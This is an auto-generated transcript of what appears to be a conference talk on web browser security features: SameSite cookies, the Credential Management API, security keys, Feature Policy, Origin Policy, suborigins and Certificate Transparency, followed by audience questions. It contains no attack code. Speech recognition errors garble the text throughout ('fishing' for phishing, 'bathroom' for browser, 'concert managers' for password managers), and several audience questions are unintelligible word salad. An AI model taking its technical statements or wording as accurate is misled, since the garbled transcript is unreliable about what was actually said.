be able to force you to tradition be to be removed from your JH we rolled this change out in chrome 5657 firefox just rolled it out in Firefox 52 and it looks like it's going to stick it's a little bit iffy to make changes like this because of the number of websites that use cookies weird ways we've seen some issues with it but hopefully the issue to think that we can without authentication living contributed to the thing that cookies usually do which is authentication it is incredibly important that we stop session because fishing is one of the huge user facing problems that even if we solved all the technical stuff fishing is going to force people to give up their passwords

and that's going to be problematic in terms of authentication we saw that with Podesta in the States it's just something that's going to be a perennial problem it would be great if people would use house advantages because concert managers make it possible if you not to reuse passwords across every website if you just fished on google com you don't automatically go up your da blue dots work as well one way that we can do this is by allowing websites to integrate more fully with the bathroom so the credential management API tries to do this where we say the website can get credentials from the passive editor can ask for them directly and if the user is set themselves up in such a way

that they want to automatically log into their website they'll never see a password form again I think this would be a much better world than because of today so if the password manager knows your counselor and you configured your browser to automatically sign you in then when you go to the website it'll ask credential you'll give it to the website and then you'll automatically be signed it without actually having to interact with a certain or at all the goal is that over time it should become dangerous for a user to type in a password themselves and we should be able to slowly iterate toward the world where passwords are not something that users see but instead something that is

mediated by the user agent building on top of that it would be great if we could get rid of password vault together because passwords are terrible right it'd be really nice if we could start using things like security keys how many of you have a security key okay excellent everyone should be raising our hands because it's incredibly important if you use the Google accounts of you to drop out to talent or github account for anything along those lines these are a facebook they all support second factor authentication and a security key is something that gives you really good security properties in terms of anti-phishing that is if I do evil calm it is impossible for

evil calm to respond to a challenge in the same way as good calm the token will basically generates a public/private key pair it will send the public key up to the server and then next time the server asks for something you verify that you have the same key that you had before thank you verify key persistence every time and by setting up by setting that up you can actually really good guarantees that you're actually talking to the use of you expect to be talking to so something you know something you have black ass URL learn like as qrl um I think the idea here is that your hardware device so the sturdiness of the hospital SQL us girls okay cheers p I

don't know okay sorry um it's authentication mechanism okay um program driver wrong it's really interesting we should talk yeah yeah no I'm curious I think that the reason I bet you're certain securities is because there are deployments today and we're building an API for the browser and my hope is it will build this on top of the credential matter today guys we just talked about so that developers will have kind of a one-stop shop for all 10 occation they can get passwords they can get second factors if you come up with an amazing view authentication mechanisms in the future there will be a single point where developers can go to kind of get au 0 Medicaid feature policy is

something that allows websites to turn things off so the future policy is like a sheet before the various ap is that you have on a website if you know that you're not going to use geolocation why allow yourself to have access to your location so it kind of works in a similar way to the sandbox mechanisms that you see on various medic systems where you say this process is going to do some stuff we're not going to talk to the network so don't even let us talk to that work or they tried to talk to network kill feature policy people just to remove api's from websites and say okay I'm not going to use geolocation so

they'll need to give it to me this has really interesting performance aspects because if you know you're not going to use document right then the renderer can actually do a different a fast nap on your website and say oh you're not going to do the opportunity right so I can make this amazing spare so does really interesting performance benefits but it also has really bad security events because you can actually turn off surface area and just renew it entirely from an exact this repertoire the final thing I'll talk about is an original policy we've talked about a lot apologies and it would be really nice if you didn't have to deliver each of them individually on

every website right because they're all HTTP headers origin policy tries to unify these into a single manifest file under origin that sets off the security properties and sets up other properties as well for your words so for instance i talked about chords earlier and i suggested that there's these cores pre-flight that basically verified if you actually speak cores and if you understand what's going on it would be nice if you could just assert that you understand what's going on so we could remove all of these transitory and not valuable requests for the lac so origin policy might be a way of doing where we assert in a secure way that I understand cores please stop sending me these pre

flights just take me to course request i'll totally verify my story it also would allow you to pin things like common security qualities and instead of delivering a 4k commentary polity with every response you instead deliver it once and manifest and then have that manifest cast in the browser and used every time those are responsible about it so this has some really interesting properties I think we'll probably be able to merge it in some way with the application manifest that browsers you do today because you things like installation or home screen and I'm producing the properties that was going to happen I said last that was entirely wrong sub origin there's a thing called an origin that we talked about earlier

and the origin is kind of the core of security policy on the web it would be really nice however if especially for large origin to contain on bulk to your applications so google com is a good example of this you have ducks you have mail you have mass and all of these are separate application code by separate team that shouldn't have access to each other's data and yes they're all on google com and therefore share a lot of resources share a lot of responsibility but also share a lot of authority if you really like to get somehow shard this origin into a variety of sub origins and basically the privileges that we're doing to each

to each page and the page and hit a certain no I'm a docs sub origin I'm totally not actually google com please treat me different this has some pretty interesting properties we're still kind of working out what exactly it would mean to be a sub origin we have an implementation of the current draft synchro so the great if you could play around with it and going to give us some feedback as to whether or not we're going in the right direction but this is a really interesting area to explore because it gives you the ability to reduce the privilege of a particular page protecting the other applications on your org from prudential badness so if you look at like google.com we have

things like zeitgeist from 2007 this is not written in a secure way it was written by third parties but we haven't looked at it in a long time it did great if we could show that off in some way without are some changes before I isolated origins is a similar to sub versions but the properties of then you're going to be different you want to actually lock your side down so they can't talk to other side those eyes can't talk to it there are these things called chrome applications so in Chrome OS for instance you'll have an application that shows an HTML page we're killing from applications for a variety of reasons mostly because the

back to the web but we want to replace them with something that is Webbie but gives you the same isolation properties so you have your own creepy jar you're not making requests into the authenticated things along these lines we're also this is very exploratory so ideas here would be welcome but we're kind of trying to figure out what it would mean for an origin to really isolate itself some rest away so with that one thing before it stopped every time I come to a conference and look out and I look up the stage and everyone looks like me we are all white we all are losing our hair many of them have beards or older than they used to be and

it's kind of sad I really like to see more diversity both covers it's like this but also in our work and our lives I think it's unfortunate that the culture that we've built for whatever reasons has made it harder and harder for people that don't look like me to be successful I think that's that and one of the answers but it's something I'm thinking about a lot and I the only thing about as well and with that we're opening the stage for a few questions and I have been frightened for any volunteers exactly that maybe 11 general question to me what you're talking about it at adding features either there's not much we saw hd2

developing a new stuff it isn't a tender wait how are the view what they do poke me is there anything but like HDD 30 or something that your district focusing at with adding all the features to make them and it's worth it on the web so the most negative lately opportunity you make like this way you're good yeah I think a number of folks so first let's say the HTTP two is great and you should use it and what's I suppose is a lot hdds like no browser is employed it over HTTP which is wonderful there are new protocols that are coming out so quick is one of them where the team is experimenting with UDP is because TCP

connection they're getting some really good properties especially for things like video so yes they're working on new networking center but I think your question is actually whether we can set a new baseline so a good example of this is the the quirks mode versus standards mode for HTML where you have old HTML pages that are relying on rear behaviors that we decided we didn't want anymore and browser vendors a belated as they look at the doc type of the document and said okay this is an old lock type we're going to use this crazy old rendering mode this is the new doc type so we're going to use the nice new standard mode render mechanism that's really expensive

it's really expensive both in terms of maintenance because now we have to maintain two paths but it's also really expensive in terms of helping developers understand what's going on because we're kind of locking ourselves into backward compatible it would be nice if we could figure to not need to be backwards compatible with api's if you don't like because generally speaking if their API is you know likes then the attackers will use them and we need to figure out ways of actually turning them off either by Chilean entirely from the web or by giving developers the ability to turn them all themselves one thing we've been thinking about is the notion of a like security mode where you say you send the

head over to send please make me secure one and maybe over time that turns embassies make me security or please make me secure three and we have just like a different set of settings that we apply to a page based on the movies you've opted into I think that's a totally reasonable thing to explore but it's not really clear to me what we can do in that kind of in a simple toggle sort of way that really improve security of the website some things are relatively straightforward life turning out document right that would have really nice and thoughts other things are more difficult like setting up a common security policy is generally requires a lot of server-side changes

and requires you to really understand the application so I would love for there to be a new mode for the web that just turns a lot of things off trying to contours of that is is is difficult but I think a worthwhile effort movie every market cheering for shooting right now it's not it's not one in so long honey yeah I understand Alton way like don'twe going forward and marketing pages that did you stop me is devil Secutor buzz you just better yeah so what were there are two things here first really importantly in a lot of those cases we end up using users as a cudgel against the website and hitting a website with

their users makes the website change but also kind of makes the user sad because they're also getting hits in this process so she'll one depredation is a good example of this where when large websites you shall once we can't turn it off without making you and there's a really interesting balance that we need to find between making users sad and making websites change and I don't think that we found that yet I think we're still figuring out how far we can do because all of these kinds of changes improve security but at the expense of user happiness and kind of the end goal increases be happy on the web and to be doing good things and we

want them to be secure while they're doing it but we can't take security in absolute like it would be great if we just turned off a lot of 80 eyes but doing so would break lots of websites and finding your balance there is difficult and something that we saw one last short question and afterwards you're welcome to continue discussing you'll find my carrel there's a very comfortable job day for the workshop one and also great coming awesome last question um the family we can talk in a bit much okay I'm wondering a couple of the things you talked about I'll see the focus on it rather than rather than having a non-deterministic behaviour rather than having differences with the

first contacts so swingers website Google in particular has backed as analytics and those those those certificates people were seeing extra tentative painting has a lot of the a lot of support rate their universe I'm just again do you know what are there any efforts underway to detect bad certificate given the depth of that that taste yeah so specific a threat sparrin see is the the big fat that we're making Todd trying to figure out what's going on where you go system still good transparency it's basically a mechanism of forcing certificates to be pulling and we use the magic block chain and then everything is that it right so you have a block chain of certificates and you said and you can

verifiably prove that the certificate was given to you at some point and we're starting to force again we're forcing CA is to use of the transparency and actually submit all the certificates they meant to a set of the surveillance systems that allow us to verify that cert is actually valid so for symantec I think we're already requiring that an SCT in the cert and for other cas I expect that we'll be making like the goal is to get to see CT everywhere you should be able to verify your certs and I think we're making progress to a cycle so city is I hope the anti serials [Applause]